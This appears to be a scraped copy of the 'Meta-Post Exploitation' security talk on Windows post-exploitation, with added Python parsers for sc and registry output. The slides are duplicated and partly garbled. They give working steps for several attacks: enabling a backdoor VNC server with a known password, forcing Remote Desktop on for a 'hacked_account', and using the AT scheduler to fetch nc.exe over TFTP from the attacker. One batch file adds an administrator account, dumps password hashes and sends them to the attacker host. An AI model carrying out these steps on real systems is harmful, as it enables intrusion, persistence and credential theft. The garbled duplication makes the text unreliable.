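    cmds += [f"sc \\\\{host} start {s}" for s in services]
    cmds += [f"sc \\\\{host} query {s}" for s in services]
    return cmds


STATE_RE = re.compile(r"^\s*STATE\s*:\s*\d+\s+(\w+)", re.MULTILINE)
FAIL_RE = re.compile(r"\[SC\] \S+ FAILED (\d+):")


def parse_sc_query(output):
    """State word (RUNNING, STOPPED, START_PENDING, ...) from `sc query`
    output, or 'ERROR <win32 code>' when sc printed a failure line instead
    (1060 = service does not exist, 5 = access denied)."""
    m = STATE_RE.search(output)
    if m:
        return m.group(1)
    m = FAIL_RE.search(output)
    if m:
        return "ERROR " + m.group(1)
    raise ValueError("unrecognised sc output")


def not_running(results):
    """Names of the (service, query_output) pairs whose state is not RUNNING."""
    return [svc for svc, out in results if parse_sc_query(out) != "RUNNING"]


# Constructed samples in the layout `sc query` prints.
SAMPLE_RUNNING = """SERVICE_NAME: netdde
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
"""
SAMPLE_STOPPED = """SERVICE_NAME: clipsrv
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1068  (0x42c)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
"""
SAMPLE_MISSING = """[SC] EnumQueryServicesStatus:OpenService FAILED 1060:

The specified service does not exist as an installed service.
"""

if __name__ == "__main__":
    print("\n".join(reenable_commands("target01")))
    print(not_running([("netdde", SAMPLE_RUNNING), ("clipsrv", SAMPLE_STOPPED)]))
```

A STOPPED ClipSrv with WIN32_EXIT_CODE 1068 (dependency failed to start) points back at NetDDE, which is why the query runs for all three rather than just the last one.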
Slide 51
Feature Modification
• Enabling VNC (from the command line)
– Go get VNC (check out guhnu)
– Make a folder on the target for the VNC files
– Copy the following files to the target folder:
• winvnc.exe
• vnc.reg
• vnchooks.dll
• omnithread_rt.dll
– regedit /s vnc.reg
– winvnc -install
– net start "vnc server"
– winvnc
– Password is "infected"
vnc.reg file contents (regedit /s needs the version header on the first line):
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8
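Both enable_ts.reg (Slide 54) and vnc.reg above are regedit 5.00 export files: quoted value names, `dword:` and `hex:` syntax, and a trailing backslash to continue a long hex value onto the next line are what `regedit /s` expects. The Python below is an added example (not from the talk) that parses that format into typed values and uses it for two checks: whether a .reg file turns Terminal Services connections on, and what bytes a WinVNC password value holds. The inline file contents are constructed copies of the slides' values; the VNC fragment keeps only a few of them.

```python
r"""Parse regedit "Version 5.00" export files such as enable_ts.reg and vnc.reg.

Added example for this write-up, not code from the talk. Handles the value
syntaxes those files use (dword:, hex:, quoted REG_SZ, the @ default) and
hex continuation lines. The two file bodies below are constructed inline.
"""

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
VNC_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default"

ENABLE_TS = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""

VNC_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"Password"=hex:10,4d,89,3d,\
  5a,e1,55,f8
"""


def _decode(value):
    """One value's right-hand side to a Python object."""
    if len(value) >= 2 and value.startswith('"') and value.endswith('"'):
        return value[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    if value.startswith("dword:"):
        return int(value[len("dword:"):], 16)
    if value.startswith("hex:"):
        return bytes(int(b, 16) for b in value[len("hex:"):].split(",") if b.strip())
    raise ValueError("unsupported value syntax: " + value)


def parse_reg(text):
    """{key_path: {value_name: value}}. Delete markers (a key starting with
    '-' or a value of '-') are not used by these files and are not handled."""
    # A trailing backslash continues a hex value on the next (indented) line.
    joined, pending = [], ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        joined.append(line)
    keys, current = {}, None
    for line in joined:
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None:
            raise ValueError("value outside any [key]: " + line)
        if line.startswith('"'):
            # Quoted name: split at the '=' that follows the closing quote
            # (names containing an escaped quote are not handled here).
            end = line.index('"', 1)
            name, value = line[1:end], line[end + 1:].lstrip("=")
        else:  # the @ default value
            name, _, value = line.partition("=")
        keys[current][name] = _decode(value.strip())
    return keys


def rdp_enabled(reg):
    """True when the file turns Terminal Services connections on."""
    ts = reg.get(TS_KEY, {})
    return ts.get("fDenyTSConnections") == 0 and ts.get("TSEnabled", 1) == 1


if __name__ == "__main__":
    print(rdp_enabled(parse_reg(ENABLE_TS)))
    print(parse_reg(VNC_REG)[VNC_KEY]["Password"].hex())
```

The WinVNC Password value is not a hash: WinVNC 3 stores the password DES-encrypted under a fixed key that ships with every VNC implementation, so anyone who can read HKLM\SOFTWARE\ORL\WinVNC3 can recover it. That is also why the slide can ship a .reg with a known password ("infected"), and why the same key is worth dumping on boxes that already run VNC.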
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
– Having a GUI to your target can be necessary
– Maybe they are running a specialized GUI app
• Ex: a system controlling access to security doors
– No command-line way of modifying the system; you need the GUI
• SCADA systems
• Security cameras
• Who knows what you might be up to
– Remote Desktop is fast and already a feature of the OS
– However it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
– Complicated procedure, especially if GPOs are involved
– Create a file named fix_ts_policy.ini:
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeRemoteInteractiveLogonRight = hacked_account
SeInteractiveLogonRight = hacked_account
SeDenyInteractiveLogonRight =
SeDenyRemoteInteractiveLogonRight =
SeDenyNetworkLogonRight =
– This template grants the account "Allow log on through Terminal Services" and "Allow log on locally" and clears the three deny-logon rights that would otherwise override them
– Change "hacked_account" to a real account (a name, or a SID written with a leading *, which is how secedit writes them on export)
– A right listed in a template is assigned to exactly the accounts named, so add the accounts that already hold the two logon rights if you do not want to lock the admins out of the console
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
• Changing existing features or settings to benefit our activities
• Goals
– Support all post-exploitation activities
– Disabling detection technologies
– Enabling insecure or easy-to-use access software
Slide 47
Feature Modification
• Feature modification is basically securable object manipulation
– Remember all those tokens and security descriptors?
– These can be modified programmatically and directly
• Not just through existing tools
– Stealth/persistence requirements
• May make it more advantageous to use custom tools
– Access objects programmatically
– Can be much more complex to implement
Slide 48
Feature Modification
• Re-enabling disabled access
– PsExec: it's still cool (thanks, Mark)
• Enabling GUI access
– VNC (from a command line)
– Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
– Firewalls, AV, logging
• Modifying local security policies
Slide 49
Feature Modification
• Enabling PsExec
– PsExec was a great, awesome remote shell/command tool
– Everybody now disables ClipBook, which PsExec requires (l4m3)
– Let's re-enable it
Slide 50
Feature Modification
• Enabling PsExec
• Use the system control tool, sc.exe
– net use \\target\ipc$ /user:name userpassword
– sc \\target config netdde start= auto
– sc \\target config netddedsdm start= auto
– sc \\target config clipsrv start= auto
– sc \\target start netdde
– sc \\target start netddedsdm
– sc \\target start clipsrv
Slide 51
Feature Modification
• Enabling VNC (from command line)
– Go get VNC (check out guh.nu)
– Make a folder on the target for the VNC files
– Copy the following files to the target folder:
• winvnc.exe
• vnc.reg
• vnchooks.dll
• omnithread_rt.dll
– regedit -s vnc.reg
– winvnc -install
– net start "vnc server"
– winvnc
– Password is "infected"
vnc.reg file contents:
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
– Having a GUI to your target can be necessary
– Maybe they are running a specialized GUI app
• Ex: a system controlling access to security doors
– No command-line way of modifying the system; you need the GUI
• SCADA systems
• Security cameras
• Who knows what you might be up to
– Remote Desktop is fast and already a feature of the OS
– However, it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
